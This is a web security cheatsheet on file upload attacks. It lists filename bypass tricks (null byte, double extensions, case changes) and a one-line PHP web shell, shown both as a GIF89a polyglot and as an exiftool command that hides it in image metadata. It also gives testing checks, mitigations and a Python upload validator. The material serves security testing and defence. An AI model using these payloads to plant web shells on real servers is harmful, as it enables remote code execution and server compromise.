File Upload Attacks

Web cheatsheet — Web application enumeration and exploitation techniques.

Overview

File Upload vulnerabilities occur when a web application fails to properly validate uploaded files. Attackers can upload malicious files (web shells, executable scripts) that bypass restrictions to achieve remote code execution or server compromise.

Common bypass techniques include MIME type spoofing, double extensions, null byte injection, and content-type manipulation.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting File Upload Attacks:

shell.php%00.jpg
shell.php.jpg
shell.pHp
shell.php5
shell.asp;.jpg
Content-Type: image/jpeg (inject as image)
GIF89a; <?php system($_GET['cmd']); ?>
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg

Tools & Techniques

Recommended checks and techniques when testing for File Upload Attacks:

  • Check Content-Type and Content-Disposition headers
  • Test multiple content-type values
  • Try extension variations and case mutations
  • Test magic byte injection in file content
  • Analyze upload directory for path traversal

Prevention & Mitigation

Security recommendations to prevent File Upload Attacks:

  • Validate file extensions against an allowlist only
  • Verify MIME type server-side (not just client-side)
  • Store uploaded files outside the web root
  • Use random file names to prevent direct access
  • Scan uploaded files with antivirus/malware tools
  • Serve uploads from a separate domain without execution rights
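The mitigations above combined into one server-side check, as an added example that is not part of the original cheatsheet. It applies an extension allowlist, rejects the null-byte, double-extension and case-mutation names from the payload list, verifies magic bytes, and returns a random storage name; the allowlist, the name pattern and the storage policy are assumptions chosen for illustration.

```python
import os
import re
import secrets

# Assumed allowlist: permitted extension -> magic bytes the content must begin with.
# Anything not listed (php, php5, asp, ...) is rejected regardless of case tricks.
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Assumed pattern for the part of the name before the extension.
STEM_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def check_upload(filename: str, content: bytes) -> tuple[bool, str]:
    """Validate an upload against the allowlist and magic bytes.

    Returns (True, random_storage_name) or (False, rejection_reason).
    """
    # Control characters (the null byte in shell.php%00.jpg once URL-decoded) never belong in a name.
    if any(ord(ch) < 32 for ch in filename):
        return False, "control character in file name"
    # Keep only the last path component so ../ style names cannot escape the upload directory.
    base = os.path.basename(filename.replace("\\", "/"))
    # Require exactly one dot: shell.php.jpg and shell.asp;.jpg both fail here.
    if base.count(".") != 1:
        return False, "file name must be name.ext"
    stem, ext = base.rsplit(".", 1)
    if not STEM_RE.fullmatch(stem):
        return False, "unexpected characters in file name"
    # Case-normalise so shell.pHp is judged as php and rejected by the allowlist.
    ext = ext.lower()
    if ext not in ALLOWED_TYPES:
        return False, f"extension '{ext}' not in allowlist"
    # The content must look like the claimed type; a bare PHP script has no image header.
    if not content.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match extension"
    # A GIF89a polyglot carrying PHP still passes the header check. That is why the file is
    # stored under a random name with the allowlisted extension, outside the web root, and
    # served without execution rights: the embedded code is then never interpreted.
    return True, f"{secrets.token_hex(16)}.{ext}"
```

The returned name is meant to be joined to a fixed upload directory outside the web root; the caller never reuses the client-supplied name.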
